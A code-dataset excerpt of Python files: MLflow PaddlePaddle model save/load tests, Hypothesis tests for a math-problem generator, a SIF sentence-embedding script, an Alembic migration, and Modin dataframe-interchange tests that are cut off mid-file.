hexsha stringlengths 40 40 | size int64 1 1.03M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 239 | max_stars_repo_name stringlengths 5 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 239 | max_issues_repo_name stringlengths 5 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 239 | max_forks_repo_name stringlengths 5 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.03M | avg_line_length float64 1 958k | max_line_length int64 1 1.03M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ace729c2c264b3e6af35ce7fe2d39b75c2ce83f3 | 22,812 | py | Python | tests/paddle/test_paddle_model_export.py | ka30r/mlflow | cfbf9eb4d619432a0bb86492ba28b9b4d1473e4e | [
"Apache-2.0"
] | null | null | null | tests/paddle/test_paddle_model_export.py | ka30r/mlflow | cfbf9eb4d619432a0bb86492ba28b9b4d1473e4e | [
"Apache-2.0"
] | null | null | null | tests/paddle/test_paddle_model_export.py | ka30r/mlflow | cfbf9eb4d619432a0bb86492ba28b9b4d1473e4e | [
"Apache-2.0"
] | null | null | null | from collections import namedtuple
import pytest
import numpy as np
import os
from unittest import mock
import yaml
import paddle
from paddle.nn import Linear
import paddle.nn.functional as F
from sklearn.datasets import load_boston
from sklearn.model_selection import train_test_split
from sklearn import preprocessing
import mlflow.pyfunc as pyfunc
import mlflow.paddle
from mlflow.models import Model
from mlflow.store.artifact.s3_artifact_repo import S3ArtifactRepository
from mlflow.tracking.artifact_utils import _download_artifact_from_uri
from mlflow.utils.environment import _mlflow_conda_env
from mlflow.utils.file_utils import TempDir
from mlflow.utils.model_utils import _get_flavor_configuration
from mlflow.tracking._model_registry import DEFAULT_AWAIT_MAX_SLEEP_SECONDS
from tests.helper_functions import mock_s3_bucket # pylint: disable=unused-import
from tests.helper_functions import set_boto_credentials # pylint: disable=unused-import
from tests.helper_functions import _assert_pip_requirements
ModelWithData = namedtuple("ModelWithData", ["model", "inference_dataframe"])
@pytest.fixture(scope="session")
def get_dataset():
X, y = load_boston(return_X_y=True)
min_max_scaler = preprocessing.MinMaxScaler()
X_min_max = min_max_scaler.fit_transform(X)
X_normalized = preprocessing.scale(X_min_max, with_std=False)
X_train, X_test, y_train, y_test = train_test_split(
X_normalized, y, test_size=0.2, random_state=42
)
y_train = y_train.reshape(-1, 1)
y_test = y_test.reshape(-1, 1)
return np.concatenate((X_train, y_train), axis=1), np.concatenate((X_test, y_test), axis=1)
@pytest.fixture
def pd_model():
class Regressor(paddle.nn.Layer):
def __init__(self):
super(Regressor, self).__init__()
self.fc_ = Linear(in_features=13, out_features=1)
@paddle.jit.to_static
def forward(self, inputs): # pylint: disable=arguments-differ
return self.fc_(inputs)
model = Regressor()
model.train()
training_data, test_data = get_dataset()
opt = paddle.optimizer.SGD(learning_rate=0.01, parameters=model.parameters())
EPOCH_NUM = 10
BATCH_SIZE = 10
for epoch_id in range(EPOCH_NUM):
np.random.shuffle(training_data)
mini_batches = [
training_data[k : k + BATCH_SIZE] for k in range(0, len(training_data), BATCH_SIZE)
]
for iter_id, mini_batch in enumerate(mini_batches):
x = np.array(mini_batch[:, :-1]).astype("float32")
y = np.array(mini_batch[:, -1:]).astype("float32")
house_features = paddle.to_tensor(x)
prices = paddle.to_tensor(y)
predicts = model(house_features)
loss = F.square_error_cost(predicts, label=prices)
avg_loss = paddle.mean(loss)
if iter_id % 20 == 0:
print(
"epoch: {}, iter: {}, loss is: {}".format(epoch_id, iter_id, avg_loss.numpy())
)
avg_loss.backward()
opt.step()
opt.clear_grad()
np_test_data = np.array(test_data).astype("float32")
return ModelWithData(model=model, inference_dataframe=np_test_data[:, :-1])
@pytest.fixture
def model_path(tmpdir):
return os.path.join(str(tmpdir), "model")
@pytest.fixture
def pd_custom_env(tmpdir):
conda_env = os.path.join(str(tmpdir), "conda_env.yml")
_mlflow_conda_env(conda_env, additional_pip_deps=["paddle", "pytest"])
return conda_env
@pytest.mark.large
def test_model_save_load(pd_model, model_path):
mlflow.paddle.save_model(pd_model=pd_model.model, path=model_path)
reloaded_pd_model = mlflow.paddle.load_model(model_uri=model_path)
reloaded_pyfunc = pyfunc.load_pyfunc(model_uri=model_path)
np.testing.assert_array_almost_equal(
pd_model.model(pd_model.inference_dataframe),
reloaded_pyfunc.predict(pd_model.inference_dataframe),
decimal=5,
)
np.testing.assert_array_almost_equal(
reloaded_pd_model(pd_model.inference_dataframe),
reloaded_pyfunc.predict(pd_model.inference_dataframe),
decimal=5,
)
def test_model_load_from_remote_uri_succeeds(pd_model, model_path, mock_s3_bucket):
mlflow.paddle.save_model(pd_model=pd_model.model, path=model_path)
artifact_root = "s3://{bucket_name}".format(bucket_name=mock_s3_bucket)
artifact_path = "model"
artifact_repo = S3ArtifactRepository(artifact_root)
artifact_repo.log_artifacts(model_path, artifact_path=artifact_path)
model_uri = artifact_root + "/" + artifact_path
reloaded_model = mlflow.paddle.load_model(model_uri=model_uri)
np.testing.assert_array_almost_equal(
pd_model.model(pd_model.inference_dataframe),
reloaded_model(pd_model.inference_dataframe),
decimal=5,
)
@pytest.mark.large
def test_model_log(pd_model, model_path):
old_uri = mlflow.get_tracking_uri()
model = pd_model.model
with TempDir(chdr=True, remove_on_exit=True) as tmp:
for should_start_run in [False, True]:
try:
mlflow.set_tracking_uri("test")
if should_start_run:
mlflow.start_run()
artifact_path = "model"
conda_env = os.path.join(tmp.path(), "conda_env.yaml")
_mlflow_conda_env(conda_env, additional_pip_deps=["paddle"])
mlflow.paddle.log_model(
pd_model=model, artifact_path=artifact_path, conda_env=conda_env
)
model_uri = "runs:/{run_id}/{artifact_path}".format(
run_id=mlflow.active_run().info.run_id, artifact_path=artifact_path
)
reloaded_pd_model = mlflow.paddle.load_model(model_uri=model_uri)
np.testing.assert_array_almost_equal(
model(pd_model.inference_dataframe),
reloaded_pd_model(pd_model.inference_dataframe),
decimal=5,
)
model_path = _download_artifact_from_uri(artifact_uri=model_uri)
model_config = Model.load(os.path.join(model_path, "MLmodel"))
assert pyfunc.FLAVOR_NAME in model_config.flavors
assert pyfunc.ENV in model_config.flavors[pyfunc.FLAVOR_NAME]
env_path = model_config.flavors[pyfunc.FLAVOR_NAME][pyfunc.ENV]
assert os.path.exists(os.path.join(model_path, env_path))
finally:
mlflow.end_run()
mlflow.set_tracking_uri(old_uri)
def test_log_model_calls_register_model(pd_model):
artifact_path = "model"
register_model_patch = mock.patch("mlflow.register_model")
with mlflow.start_run(), register_model_patch:
mlflow.paddle.log_model(
pd_model=pd_model.model,
artifact_path=artifact_path,
conda_env=None,
registered_model_name="AdsModel1",
)
model_uri = "runs:/{run_id}/{artifact_path}".format(
run_id=mlflow.active_run().info.run_id, artifact_path=artifact_path
)
mlflow.register_model.assert_called_once_with(
model_uri, "AdsModel1", await_registration_for=DEFAULT_AWAIT_MAX_SLEEP_SECONDS
)
def test_log_model_no_registered_model_name(pd_model):
artifact_path = "model"
register_model_patch = mock.patch("mlflow.register_model")
with mlflow.start_run(), register_model_patch:
mlflow.paddle.log_model(
pd_model=pd_model.model, artifact_path=artifact_path, conda_env=None,
)
mlflow.register_model.assert_not_called()
@pytest.mark.large
def test_model_save_persists_specified_conda_env_in_mlflow_model_directory(
pd_model, model_path, pd_custom_env
):
mlflow.paddle.save_model(pd_model=pd_model.model, path=model_path, conda_env=pd_custom_env)
pyfunc_conf = _get_flavor_configuration(model_path=model_path, flavor_name=pyfunc.FLAVOR_NAME)
saved_conda_env_path = os.path.join(model_path, pyfunc_conf[pyfunc.ENV])
assert os.path.exists(saved_conda_env_path)
assert saved_conda_env_path != pd_custom_env
with open(pd_custom_env, "r") as f:
pd_custom_env_parsed = yaml.safe_load(f)
with open(saved_conda_env_path, "r") as f:
saved_conda_env_parsed = yaml.safe_load(f)
assert saved_conda_env_parsed == pd_custom_env_parsed
@pytest.mark.large
def test_model_save_accepts_conda_env_as_dict(pd_model, model_path):
conda_env = dict(mlflow.paddle.get_default_conda_env())
conda_env["dependencies"].append("pytest")
mlflow.paddle.save_model(pd_model=pd_model.model, path=model_path, conda_env=conda_env)
pyfunc_conf = _get_flavor_configuration(model_path=model_path, flavor_name=pyfunc.FLAVOR_NAME)
saved_conda_env_path = os.path.join(model_path, pyfunc_conf[pyfunc.ENV])
assert os.path.exists(saved_conda_env_path)
with open(saved_conda_env_path, "r") as f:
saved_conda_env_parsed = yaml.safe_load(f)
assert saved_conda_env_parsed == conda_env
@pytest.mark.large
def test_model_log_persists_specified_conda_env_in_mlflow_model_directory(pd_model, pd_custom_env):
artifact_path = "model"
with mlflow.start_run():
mlflow.paddle.log_model(
pd_model=pd_model.model, artifact_path=artifact_path, conda_env=pd_custom_env
)
model_uri = "runs:/{run_id}/{artifact_path}".format(
run_id=mlflow.active_run().info.run_id, artifact_path=artifact_path
)
model_path = _download_artifact_from_uri(artifact_uri=model_uri)
pyfunc_conf = _get_flavor_configuration(model_path=model_path, flavor_name=pyfunc.FLAVOR_NAME)
saved_conda_env_path = os.path.join(model_path, pyfunc_conf[pyfunc.ENV])
assert os.path.exists(saved_conda_env_path)
assert saved_conda_env_path != pd_custom_env
with open(pd_custom_env, "r") as f:
pd_custom_env_parsed = yaml.safe_load(f)
with open(saved_conda_env_path, "r") as f:
saved_conda_env_parsed = yaml.safe_load(f)
assert saved_conda_env_parsed == pd_custom_env_parsed
@pytest.mark.large
def test_model_save_without_specified_conda_env_uses_default_env_with_expected_dependencies(
pd_model, model_path
):
mlflow.paddle.save_model(pd_model=pd_model.model, path=model_path, conda_env=None)
pyfunc_conf = _get_flavor_configuration(model_path=model_path, flavor_name=pyfunc.FLAVOR_NAME)
conda_env_path = os.path.join(model_path, pyfunc_conf[pyfunc.ENV])
with open(conda_env_path, "r") as f:
conda_env = yaml.safe_load(f)
assert conda_env == mlflow.paddle.get_default_conda_env()
@pytest.mark.large
def test_model_log_without_specified_conda_env_uses_default_env_with_expected_dependencies(
pd_model,
):
artifact_path = "model"
with mlflow.start_run():
mlflow.paddle.log_model(
pd_model=pd_model.model, artifact_path=artifact_path, conda_env=None
)
model_uri = "runs:/{run_id}/{artifact_path}".format(
run_id=mlflow.active_run().info.run_id, artifact_path=artifact_path
)
model_path = _download_artifact_from_uri(artifact_uri=model_uri)
pyfunc_conf = _get_flavor_configuration(model_path=model_path, flavor_name=pyfunc.FLAVOR_NAME)
conda_env_path = os.path.join(model_path, pyfunc_conf[pyfunc.ENV])
with open(conda_env_path, "r") as f:
conda_env = yaml.safe_load(f)
assert conda_env == mlflow.paddle.get_default_conda_env()
@pytest.fixture(scope="session")
def get_dataset_built_in_high_level_api():
train_dataset = paddle.text.datasets.UCIHousing(mode="train")
eval_dataset = paddle.text.datasets.UCIHousing(mode="test")
return train_dataset, eval_dataset
class UCIHousing(paddle.nn.Layer):
def __init__(self):
super(UCIHousing, self).__init__()
self.fc_ = paddle.nn.Linear(13, 1, None)
def forward(self, inputs): # pylint: disable=arguments-differ
pred = self.fc_(inputs)
return pred
@pytest.fixture
def pd_model_built_in_high_level_api():
train_dataset, test_dataset = get_dataset_built_in_high_level_api()
model = paddle.Model(UCIHousing())
optim = paddle.optimizer.Adam(learning_rate=0.01, parameters=model.parameters())
model.prepare(optim, paddle.nn.MSELoss())
model.fit(train_dataset, epochs=6, batch_size=8, verbose=1)
return ModelWithData(model=model, inference_dataframe=test_dataset)
@pytest.mark.large
def test_model_save_load_built_in_high_level_api(pd_model_built_in_high_level_api, model_path):
model = pd_model_built_in_high_level_api.model
test_dataset = pd_model_built_in_high_level_api.inference_dataframe
mlflow.paddle.save_model(pd_model=model, path=model_path)
reloaded_pd_model = mlflow.paddle.load_model(model_uri=model_path)
reloaded_pyfunc = pyfunc.load_pyfunc(model_uri=model_path)
low_level_test_dataset = [x[0] for x in test_dataset]
np.testing.assert_array_almost_equal(
np.array(model.predict(test_dataset)).squeeze(),
np.array(reloaded_pyfunc.predict(np.array(low_level_test_dataset))).squeeze(),
decimal=5,
)
np.testing.assert_array_almost_equal(
np.array(reloaded_pd_model(np.array(low_level_test_dataset))).squeeze(),
np.array(reloaded_pyfunc.predict(np.array(low_level_test_dataset))).squeeze(),
decimal=5,
)
def test_model_built_in_high_level_api_load_from_remote_uri_succeeds(
pd_model_built_in_high_level_api, model_path, mock_s3_bucket
):
model = pd_model_built_in_high_level_api.model
test_dataset = pd_model_built_in_high_level_api.inference_dataframe
mlflow.paddle.save_model(pd_model=model, path=model_path)
artifact_root = "s3://{bucket_name}".format(bucket_name=mock_s3_bucket)
artifact_path = "model"
artifact_repo = S3ArtifactRepository(artifact_root)
artifact_repo.log_artifacts(model_path, artifact_path=artifact_path)
model_uri = artifact_root + "/" + artifact_path
reloaded_model = mlflow.paddle.load_model(model_uri=model_uri)
low_level_test_dataset = [x[0] for x in test_dataset]
np.testing.assert_array_almost_equal(
np.array(model.predict(test_dataset)).squeeze(),
np.array(reloaded_model(np.array(low_level_test_dataset))).squeeze(),
decimal=5,
)
@pytest.mark.large
def test_model_built_in_high_level_api_log(pd_model_built_in_high_level_api, model_path):
old_uri = mlflow.get_tracking_uri()
model = pd_model_built_in_high_level_api.model
test_dataset = pd_model_built_in_high_level_api.inference_dataframe
with TempDir(chdr=True, remove_on_exit=True) as tmp:
for should_start_run in [False, True]:
try:
mlflow.set_tracking_uri("test")
if should_start_run:
mlflow.start_run()
artifact_path = "model"
conda_env = os.path.join(tmp.path(), "conda_env.yaml")
_mlflow_conda_env(conda_env, additional_pip_deps=["paddle"])
mlflow.paddle.log_model(
pd_model=model, artifact_path=artifact_path, conda_env=conda_env
)
model_uri = "runs:/{run_id}/{artifact_path}".format(
run_id=mlflow.active_run().info.run_id, artifact_path=artifact_path
)
reloaded_pd_model = mlflow.paddle.load_model(model_uri=model_uri)
low_level_test_dataset = [x[0] for x in test_dataset]
np.testing.assert_array_almost_equal(
np.array(model.predict(test_dataset)).squeeze(),
np.array(reloaded_pd_model(np.array(low_level_test_dataset))).squeeze(),
decimal=5,
)
model_path = _download_artifact_from_uri(artifact_uri=model_uri)
model_config = Model.load(os.path.join(model_path, "MLmodel"))
assert pyfunc.FLAVOR_NAME in model_config.flavors
assert pyfunc.ENV in model_config.flavors[pyfunc.FLAVOR_NAME]
env_path = model_config.flavors[pyfunc.FLAVOR_NAME][pyfunc.ENV]
assert os.path.exists(os.path.join(model_path, env_path))
finally:
mlflow.end_run()
mlflow.set_tracking_uri(old_uri)
@pytest.fixture
def model_retrain_path(tmpdir):
return os.path.join(str(tmpdir), "model_retrain")
@pytest.mark.large
def test_model_retrain_built_in_high_level_api(
pd_model_built_in_high_level_api, model_path, model_retrain_path
):
model = pd_model_built_in_high_level_api.model
mlflow.paddle.save_model(pd_model=model, path=model_path, training=True)
training_dataset, test_dataset = get_dataset_built_in_high_level_api()
model_retrain = paddle.Model(UCIHousing())
model_retrain = mlflow.paddle.load_model(model_uri=model_path, model=model_retrain)
optim = paddle.optimizer.Adam(learning_rate=0.015, parameters=model.parameters())
model_retrain.prepare(optim, paddle.nn.MSELoss())
model_retrain.fit(training_dataset, epochs=6, batch_size=8, verbose=1)
mlflow.paddle.save_model(pd_model=model_retrain, path=model_retrain_path, training=False)
with pytest.raises(TypeError, match="This model can't be loaded"):
mlflow.paddle.load_model(model_uri=model_retrain_path, model=model_retrain)
error_model = 0
error_model_type = type(error_model)
with pytest.raises(
TypeError,
match="Invalid object type `{}` for `model`, must be `paddle.Model`".format(
error_model_type
),
):
mlflow.paddle.load_model(model_uri=model_retrain_path, model=error_model)
reloaded_pd_model = mlflow.paddle.load_model(model_uri=model_retrain_path)
reloaded_pyfunc = pyfunc.load_pyfunc(model_uri=model_retrain_path)
low_level_test_dataset = [x[0] for x in test_dataset]
np.testing.assert_array_almost_equal(
np.array(model_retrain.predict(test_dataset)).squeeze(),
np.array(reloaded_pyfunc.predict(np.array(low_level_test_dataset))).squeeze(),
decimal=5,
)
np.testing.assert_array_almost_equal(
np.array(reloaded_pd_model(np.array(low_level_test_dataset))).squeeze(),
np.array(reloaded_pyfunc.predict(np.array(low_level_test_dataset))).squeeze(),
decimal=5,
)
@pytest.mark.large
def test_log_model_built_in_high_level_api(pd_model_built_in_high_level_api, model_path):
old_uri = mlflow.get_tracking_uri()
model = pd_model_built_in_high_level_api.model
_, test_dataset = get_dataset_built_in_high_level_api()
with TempDir(chdr=True, remove_on_exit=True) as tmp:
for should_start_run in [False, True]:
try:
mlflow.set_tracking_uri("test")
if should_start_run:
mlflow.start_run()
artifact_path = "model"
conda_env = os.path.join(tmp.path(), "conda_env.yaml")
_mlflow_conda_env(conda_env, additional_pip_deps=["paddle"])
mlflow.paddle.log_model(
pd_model=model, artifact_path=artifact_path, conda_env=conda_env, training=True
)
model_uri = "runs:/{run_id}/{artifact_path}".format(
run_id=mlflow.active_run().info.run_id, artifact_path=artifact_path
)
model_uri = mlflow.get_artifact_uri("model")
model_retrain = paddle.Model(UCIHousing())
optim = paddle.optimizer.Adam(learning_rate=0.015, parameters=model.parameters())
model_retrain.prepare(optim, paddle.nn.MSELoss())
model_retrain = mlflow.paddle.load_model(model_uri=model_uri, model=model_retrain)
np.testing.assert_array_almost_equal(
np.array(model.predict(test_dataset)).squeeze(),
np.array(model_retrain.predict(test_dataset)).squeeze(),
decimal=5,
)
model_path = _download_artifact_from_uri(artifact_uri=model_uri)
model_config = Model.load(os.path.join(model_path, "MLmodel"))
assert pyfunc.FLAVOR_NAME in model_config.flavors
assert pyfunc.ENV in model_config.flavors[pyfunc.FLAVOR_NAME]
env_path = model_config.flavors[pyfunc.FLAVOR_NAME][pyfunc.ENV]
assert os.path.exists(os.path.join(model_path, env_path))
finally:
mlflow.end_run()
mlflow.set_tracking_uri(old_uri)
@pytest.mark.large
def test_log_model_with_pip_requirements(pd_model, tmpdir):
# Path to a requirements file
req_file = tmpdir.join("requirements.txt")
req_file.write("a")
with mlflow.start_run():
mlflow.paddle.log_model(pd_model.model, "model", pip_requirements=req_file.strpath)
_assert_pip_requirements(mlflow.get_artifact_uri("model"), ["mlflow", "a"])
# List of requirements
with mlflow.start_run():
mlflow.paddle.log_model(
pd_model.model, "model", pip_requirements=[f"-r {req_file.strpath}", "b"]
)
_assert_pip_requirements(mlflow.get_artifact_uri("model"), ["mlflow", "a", "b"])
# Constraints file
with mlflow.start_run():
mlflow.paddle.log_model(
pd_model.model, "model", pip_requirements=[f"-c {req_file.strpath}", "b"]
)
_assert_pip_requirements(
mlflow.get_artifact_uri("model"), ["mlflow", "b", "-c constraints.txt"], ["a"]
)
@pytest.mark.large
def test_log_model_with_extra_pip_requirements(pd_model, tmpdir):
default_reqs = mlflow.paddle.get_default_pip_requirements()
# Path to a requirements file
req_file = tmpdir.join("requirements.txt")
req_file.write("a")
with mlflow.start_run():
mlflow.paddle.log_model(pd_model.model, "model", extra_pip_requirements=req_file.strpath)
_assert_pip_requirements(mlflow.get_artifact_uri("model"), ["mlflow", *default_reqs, "a"])
# List of requirements
with mlflow.start_run():
mlflow.paddle.log_model(
pd_model.model, "model", extra_pip_requirements=[f"-r {req_file.strpath}", "b"]
)
_assert_pip_requirements(
mlflow.get_artifact_uri("model"), ["mlflow", *default_reqs, "a", "b"]
)
# Constraints file
with mlflow.start_run():
mlflow.paddle.log_model(
pd_model.model, "model", extra_pip_requirements=[f"-c {req_file.strpath}", "b"]
)
_assert_pip_requirements(
mlflow.get_artifact_uri("model"),
["mlflow", *default_reqs, "b", "-c constraints.txt"],
["a"],
)
| 38.795918 | 99 | 0.696651 |
ace72a518b76a8a58f97d70f9a2fef85be7896cf | 1,705 | py | Python | tests/test_mathgen.py | helplessThor/mathgenerator | 88f35bd730ad0acbbc2164791d21b5d8dd47a88e | [
"MIT"
] | null | null | null | tests/test_mathgen.py | helplessThor/mathgenerator | 88f35bd730ad0acbbc2164791d21b5d8dd47a88e | [
"MIT"
] | null | null | null | tests/test_mathgen.py | helplessThor/mathgenerator | 88f35bd730ad0acbbc2164791d21b5d8dd47a88e | [
"MIT"
] | null | null | null | from math import sqrt
from mathgenerator.mathgen import *
from hypothesis import strategies as st, given, assume
@given(maxSum=st.integers(min_value=1), maxAddend=st.integers(min_value=1))
def test_additionFunc(maxSum, maxAddend):
assume(maxSum > maxAddend)
problem, solution = additionFunc(maxSum, maxAddend)
assert eval(problem[:-1]) == int(solution)
@given(maxMinuend=st.integers(min_value=1), maxDiff=st.integers(min_value=1))
def test_subtractionFunc(maxMinuend, maxDiff):
assume(maxMinuend > maxDiff)
problem, solution = subtractionFunc(maxMinuend, maxDiff)
assert eval(problem[:-1]) == int(solution)
@given(maxRes=st.integers(min_value=1), maxMulti=st.integers(min_value=1))
def test_multiplicationFunc(maxRes, maxMulti):
assume(maxRes > maxMulti)
problem, solution = multiplicationFunc(maxRes, maxMulti)
assert eval(problem[:-1]) == int(solution)
@given(maxRes=st.integers(min_value=1), maxDivid=st.integers(min_value=1))
def test_divisionFunc(maxRes, maxDivid):
assume(maxRes > maxDivid)
problem, solution = divisionFunc(maxRes, maxDivid)
assert eval(problem[:-1]) == float(solution)
@given(maxRes=st.integers(min_value=1), maxModulo=st.integers(min_value=1))
def test_moduloFunc(maxRes, maxModulo):
assume(maxRes > maxModulo)
problem, solution = moduloFunc(maxRes, maxModulo)
assert eval(problem[:-1]) == int(solution)
@given(minNo=st.integers(min_value=1), maxNo=st.integers(min_value=1, max_value=2 ** 50))
def test_squareRootFunc(minNo, maxNo):
assume(maxNo > minNo)
problem, solution = squareRootFunc(minNo, maxNo)
assert eval(problem[:-1]) == float(solution)
| 36.276596 | 90 | 0.720821 |
ace72b5ce5e03022a1243ac78f6dc27331afca0e | 759 | py | Python | SIF/summarization/embed_data.py | franciscojavierarceo/DQN-Event-Summarization | 6e651dc511affc8883d656a5b9e909f10266f41d | [
"MIT"
] | 6 | 2016-10-30T20:22:28.000Z | 2020-11-28T08:59:48.000Z | SIF/summarization/embed_data.py | franciscojavierarceo/DQN-Event-Summarization | 6e651dc511affc8883d656a5b9e909f10266f41d | [
"MIT"
] | null | null | null | SIF/summarization/embed_data.py | franciscojavierarceo/DQN-Event-Summarization | 6e651dc511affc8883d656a5b9e909f10266f41d | [
"MIT"
] | 1 | 2020-03-12T04:57:43.000Z | 2020-03-12T04:57:43.000Z | import os
import sys
import pandas as pd
sys.path.append('../src')
import data_io, params, SIF_embedding
import return_chunked
wordfile = '/home/francisco/GitHub/SIF/data/glove.840B.300d.txt' # word vector file, can be downloaded from GloVe website
weightfile = '/home/francisco/GitHub/SIF/auxiliary_data/enwiki_vocab_min200.txt' # each line is a word and its frequency
weightpara = 1e-3 # the parameter in the SIF weighting scheme, usually in the range [3e-5, 3e-3]
rmpc = 0 # ignoring principal component removal
cnn_files = '/home/francisco/GitHub/cnn-dailymail/finished_files/chunked/'
cnn_path = [x for x in os.listdir(cnn_files) if 'bin' in x]
for cnn_file in cnn_files:
abstract, sentences = show_chunked.getsentences(cnn_file)
| 37.95 | 123 | 0.758893 |
ace72bf2c7d566444178cd30bdba2fe5a20a1005 | 1,912 | py | Python | migrations/versions/22a87ce63503_multiple_files_per_post_is_easier_copy_.py | havanhuy1997/pmg-cms-2 | 21571235cf3d9552013bca29ab9af288b08e00d6 | [
"Apache-2.0"
] | 2 | 2019-06-11T20:46:43.000Z | 2020-08-27T22:50:32.000Z | migrations/versions/22a87ce63503_multiple_files_per_post_is_easier_copy_.py | havanhuy1997/pmg-cms-2 | 21571235cf3d9552013bca29ab9af288b08e00d6 | [
"Apache-2.0"
] | 70 | 2017-05-26T14:04:06.000Z | 2021-06-30T10:21:58.000Z | migrations/versions/22a87ce63503_multiple_files_per_post_is_easier_copy_.py | havanhuy1997/pmg-cms-2 | 21571235cf3d9552013bca29ab9af288b08e00d6 | [
"Apache-2.0"
] | 4 | 2017-08-29T10:09:30.000Z | 2021-05-25T11:29:03.000Z | """Multiple files per post is easier copy pasta
Revision ID: 22a87ce63503
Revises: 4dfdaa23de0
Create Date: 2017-08-17 14:12:47.484638
"""
# revision identifiers, used by Alembic.
revision = '22a87ce63503'
down_revision = '4dfdaa23de0'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.create_table('post_files',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('post_id', sa.Integer(), nullable=False),
sa.Column('file_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['file_id'], ['file.id'], name=op.f('fk_post_files_file_id_file'), ondelete='CASCADE'),
sa.ForeignKeyConstraint(['post_id'], ['post.id'], name=op.f('fk_post_files_post_id_post'), ondelete='CASCADE'),
sa.PrimaryKeyConstraint('id', name=op.f('pk_post_files'))
)
op.create_index(op.f('ix_post_files_file_id'), 'post_files', ['file_id'], unique=False)
op.create_index(op.f('ix_post_files_post_id'), 'post_files', ['post_id'], unique=False)
op.drop_index('ix_post_featured_image_id', table_name='post')
op.drop_constraint(u'fk_post_featured_image_id_file', 'post', type_='foreignkey')
op.drop_column(u'post', 'featured_image_id')
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column(u'post', sa.Column('featured_image_id', sa.INTEGER(), autoincrement=False, nullable=False))
op.create_foreign_key(u'fk_post_featured_image_id_file', 'post', 'file', ['featured_image_id'], ['id'], ondelete=u'CASCADE')
op.create_index('ix_post_featured_image_id', 'post', ['featured_image_id'], unique=False)
op.drop_index(op.f('ix_post_files_post_id'), table_name='post_files')
op.drop_index(op.f('ix_post_files_file_id'), table_name='post_files')
op.drop_table('post_files')
### end Alembic commands ###
| 43.454545 | 128 | 0.716527 |
ace72c7b0b393461b2fda6bee82b7824fc377c54 | 5,542 | py | Python | modin/test/exchange/dataframe_protocol/test_general.py | yizx-1017/modin | 2eee697135b30a9694c202456db0635c52c9e6c9 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | modin/test/exchange/dataframe_protocol/test_general.py | yizx-1017/modin | 2eee697135b30a9694c202456db0635c52c9e6c9 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | modin/test/exchange/dataframe_protocol/test_general.py | yizx-1017/modin | 2eee697135b30a9694c202456db0635c52c9e6c9 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # Licensed to Modin Development Team under one or more contributor license agreements.
# See the NOTICE file distributed with this work for additional information regarding
# copyright ownership. The Modin Development Team licenses this file to you under the
# Apache License, Version 2.0 (the "License"); you may not use this file except in
# compliance with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under
# the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific language
# governing permissions and limitations under the License.
"""Dataframe exchange protocol tests that are common for every implementation."""
import pytest
import math
import ctypes
import modin.pandas as pd
@pytest.fixture
def df_from_dict():
def maker(dct, is_categorical=False):
df = pd.DataFrame(dct, dtype=("category" if is_categorical else None))
return df
return maker
@pytest.mark.parametrize(
"test_data",
[
{"a": ["foo", "bar"], "b": ["baz", "qux"]},
{"a": [1.5, 2.5, 3.5], "b": [9.2, 10.5, 11.8]},
{"A": [1, 2, 3, 4], "B": [1, 2, 3, 4]},
],
ids=["str_data", "float_data", "int_data"],
)
def test_only_one_dtype(test_data, df_from_dict):
columns = list(test_data.keys())
df = df_from_dict(test_data)
dfX = df.__dataframe__()
column_size = len(test_data[columns[0]])
for column in columns:
assert dfX.get_column_by_name(column).null_count == 0
assert dfX.get_column_by_name(column).size == column_size
assert dfX.get_column_by_name(column).offset == 0
def test_float_int(df_from_dict):
df = df_from_dict(
{
"a": [1, 2, 3],
"b": [3, 4, 5],
"c": [1.5, 2.5, 3.5],
"d": [9, 10, 11],
"e": [True, False, True],
"f": ["a", "", "c"],
}
)
dfX = df.__dataframe__()
columns = {"a": 0, "b": 0, "c": 2, "d": 0, "e": 20, "f": 21}
for column, kind in columns.items():
colX = dfX.get_column_by_name(column)
assert colX.null_count == 0
assert colX.size == 3
assert colX.offset == 0
assert colX.dtype[0] == kind
assert dfX.get_column_by_name("c").dtype[1] == 64
def test_na_float(df_from_dict):
df = df_from_dict({"a": [1.0, math.nan, 2.0]})
dfX = df.__dataframe__()
colX = dfX.get_column_by_name("a")
assert colX.null_count == 1
def test_noncategorical(df_from_dict):
df = df_from_dict({"a": [1, 2, 3]})
dfX = df.__dataframe__()
colX = dfX.get_column_by_name("a")
with pytest.raises(RuntimeError):
colX.describe_categorical
def test_categorical(df_from_dict):
df = df_from_dict(
{"weekday": ["Mon", "Tue", "Mon", "Wed", "Mon", "Thu", "Fri", "Sat", "Sun"]},
is_categorical=True,
)
colX = df.__dataframe__().get_column_by_name("weekday")
is_ordered, is_dictionary, _ = colX.describe_categorical.values()
assert isinstance(is_ordered, bool)
assert isinstance(is_dictionary, bool)
def test_dataframe(df_from_dict):
df = df_from_dict(
